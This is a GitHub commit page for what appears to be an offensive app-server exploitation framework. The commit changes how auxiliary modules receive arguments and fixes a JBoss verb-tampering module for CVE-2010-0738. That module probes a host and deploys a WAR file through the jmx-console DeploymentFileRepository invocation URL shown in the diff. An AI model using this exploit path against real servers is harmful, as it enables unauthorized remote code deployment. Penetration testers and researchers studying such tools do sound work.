Skip to content

Commit

Permalink
Modifications from #33
Browse files Browse the repository at this point in the history
* src/core/auxengine.py
  -- Auxiliary modules can now enable parameter passing via the
  enable_args flag.  Flag arguments will then be passed into
  the module via the fingerengine.options argument.
* src/platform/jboss/auxiliary/verb_tamper.py
  -- Few more fixes to this and an enabling of enable_args so
  that we don't confuse the deployer.  Not sure why this was
  so broken...
  • Loading branch information
hatRiot committed Jan 25, 2015
1 parent d9d956a commit cac3b14
Show file tree
Hide file tree
Showing 2 changed files with 16 additions and 7 deletions.
17 changes: 13 additions & 4 deletions src/core/auxengine.py
Original file line number Diff line number Diff line change
@@ -1,6 +1,7 @@
from os.path import abspath
from argparse import SUPPRESS
from log import LOG
from re import sub
import deployer
import undeployer
import pkgutil
Expand Down Expand Up @@ -40,7 +41,12 @@ def auxengine(fingerengine):
if mod.name not in found and mod.check(fingerprint):
if fingerengine.options.fp:
utility.Msg(" %s (--%s)" % (mod.name, mod.flag), LOG.UPDATE)
elif vars(fingerengine.options)[mod.flag]:

# work around argparse internally converting - to _ for var names
elif (mod.flag in vars(fingerengine.options) and \
vars(fingerengine.options)[mod.flag]) or \
(sub('-','_',mod.flag) in vars(fingerengine.options) and\
vars(fingerengine.options)[sub('-','_',mod.flag)]):
try:
mod.run(fingerengine, fingerprint)
except Exception, e:
Expand All @@ -65,7 +71,7 @@ def execMod(fingerengine):
def build_platform_flags(platform, egroup):
""" This builds the auxiliary argument group
"""

fpath = [abspath("./src/platform/%s/auxiliary" % platform)]
modules = list(pkgutil.iter_modules(fpath))

Expand All @@ -82,7 +88,10 @@ def build_platform_flags(platform, egroup):
if not 'flag' in dir(mod):
continue

egroup.add_argument("--%s" % mod.flag, action='store_true', dest=mod.flag,
help=SUPPRESS)
if 'enable_args' in dir(mod):
egroup.add_argument("--%s" % mod.flag, action='store', help=SUPPRESS)
else:
egroup.add_argument("--%s" % mod.flag, action='store_true', dest=mod.flag,
help=SUPPRESS)

return egroup
6 changes: 3 additions & 3 deletions src/platform/jboss/auxiliary/verb_tamper.py
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,7 @@ def __init__(self):
self.name = 'JBoss Verb Tampering (CVE-2010-0738)'
self.versions = ["4.0"]
self.flag = 'verb-tamper'
self.enable_args = True

def check(self, fingerprint):
"""
Expand All @@ -32,14 +33,13 @@ def run(self, fingerengine, fingerprint):
utility.Msg("Checking %s for verb tampering" % fingerengine.options.ip,
LOG.DEBUG)

url = "http://{0}:{1}/jmx-console/HtmlAdaptor".format(fingerengine.options.ip,
fingerprint.port)
url = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)

response = utility.requests_head(url)
if response.status_code == 200:
utility.Msg("Vulnerable to verb tampering, attempting to deploy...", LOG.SUCCESS)

war_file = abspath(fingerengine.options.deploy)
war_file = abspath(fingerengine.options.verb_tamper)
war_name = parse_war_path(war_file)
tamper = "/jmx-console/HtmlAdaptor?action=invokeOp"\
"&name=jboss.admin:service=DeploymentFileRepository&methodIndex=5"\
Expand Down

0 comments on commit cac3b14

Please sign in to comment.